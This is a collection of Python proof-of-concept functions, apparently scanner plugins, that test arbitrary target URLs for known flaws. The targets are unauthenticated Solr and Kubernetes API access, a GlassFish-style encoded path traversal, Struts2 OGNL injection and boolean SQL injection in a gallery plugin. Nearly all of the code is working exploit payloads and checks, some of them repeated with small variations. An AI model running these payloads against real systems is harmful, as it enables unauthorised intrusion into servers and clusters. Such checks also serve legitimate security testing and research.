def poc(target): base_url = target if "://" in target else 'http://' + target for each in iterate_path(base_url): try: url = each g = requests.get(url, headers={'User-Agent': firefox()}) if g.status_code is 200 and 'Solr Admin' in g.content and 'Dashboard' in g.content: return url url = url + '/solr/' g = requests.get(url, headers={'User-Agent': firefox()}) if g.status_code is 200 and 'Solr Admin' in g.content and 'Dashboard' in g.content: return url except Exception: pass return False
def poc(url): portlist = [ '21', '22', '23', '25', '53', '110', '137', '161', '389', '445', '873', '1090', '1099', '1433', '1521', '2049', '2181', '2222', '2375', '3306', '3389', '5432', '5901', '5984', '6379', '11211', '27017' ] if url.split(':')[1] in portlist: return False elif int(url.split(':')[1]) == 443: url = 'https://' + url.split(':')[0] elif int(url.split(':')[1]) == 8443: url = 'https://' + url else: url = 'http://' + url fileList = r""" / /solr/ """ paths = fileList.strip().splitlines() for path in paths: try: url = url + path.strip() requests.packages.urllib3.disable_warnings( ) #解决InsecureRequestWarning警告 g = requests.get(url, headers={'User-Agent': firefox()}, verify=False, timeout=5) if g.status_code == 200 and 'Solr Admin' in g.content and 'Dashboard' in g.content: return '[solr unauth]\t' + url else: continue except Exception: return False
def poc(url): if '://' not in url: url = 'http://' + url url = get_domain(url) payload = '/theme/META-INF/%c0%ae%c0%ae/META-INF/MANIFEST.MF' try: c = requests.get(url + payload, headers={'User-Agent': firefox()}, timeout=10).content except Exception: return False if 'Version' in c: return True return False
def poc(url): if '://' not in url: url = 'http://' + url if '?' in url: url = url.split('?')[0] if '.action' not in url: url = redirectURL(url) key = randomString() payload = "?debug=browser&object=(%23mem=%[email protected]@DEFAULT_MEMBER_ACCESS)%3f%23context[%23parameters.rpsobj[0]].getWriter().println(%23parameters.content[0]):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=" + key target = (url + payload) try: c = requests.get(target, headers={'User-Agent': firefox()}, timeout=5).content if key in c and 'xwork2.dispatcher' not in c: return url except Exception, e: return False
def poc(url): if '://' not in url: url = 'http://' + url if '?' in url: url = url.split('?')[0] if '.action' not in url: url = redirectURL(url) key = randomString() payload = "?debug=browser&object=(%23mem=%[email protected]@DEFAULT_MEMBER_ACCESS)%3f%23context[%23parameters.rpsobj[0]].getWriter().println(%23parameters.content[0]):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=" + key target = (url + payload) try: c = requests.get(target, headers={ 'User-Agent': firefox() }, timeout=5).content if key in c and 'xwork2.dispatcher' not in c: return url except Exception, e: logging.debug(e)
def poc(url): target = get_entry(url) if not target: return False if CHECK_WAF and has_waf(target): return '[Uncertain,WAF detected!] ' + get_domain(target) data_temp = "page=1&galleryid=[P]&task=load_videos_content&perpage=20&linkbutton=2" # Content-Type needed headers = {'User-Agent': firefox(), 'Content-Type': 'application/x-www-form-urlencoded'} try: r1 = requests.post(target, headers=headers, data=data_temp.replace('[P]', '-1 OR 1=1')) r2 = requests.post(target, headers=headers, data=data_temp.replace('[P]', '-1 OR 1=2')) except: return False if r1.status_code == r2.status_code == 200 and len(r1.content) != len(r2.content): return True return False
def poc(url): if '://' not in url: url = 'http://' + url if '443' in url: url = url.replace('http:', 'https:') try: g = requests.get(url, headers={'User-Agent': firefox()}, timeout=3, verify=False) if g.status_code is 200 and 'healthz' in g.content and 'metrics' in g.content: pods = subprocess.Popen( "kubectl -s %s get pods --all-namespaces=true -o=wide" % url, stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=open("/dev/null", "w"), shell=True) output = pods.communicate()[0].decode("utf-8") if "Please enter Username" not in output and "Error from server" not in output: return url except Exception: pass return False
""" import requests from plugin.useragent import firefox from plugin.util import randomString, redirectURL def poc(url): if '://' not in url: url = 'http://' + url if '?' in url: url = url.split('?')[0] if '.action' not in url: try: url = redirectURL(url) except Exception, e: return False key = randomString() payload = "?debug=browser&object=(%23mem=%[email protected]@DEFAULT_MEMBER_ACCESS)%3f%23context[%23parameters.rpsobj[0]].getWriter().println(%23parameters.content[0]):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=" + key target = (url + payload) try: c = requests.get(target, headers={ 'User-Agent': firefox() }, timeout=5).content if key in c and 'xwork2.dispatcher' not in c: return url except Exception, e: return False return False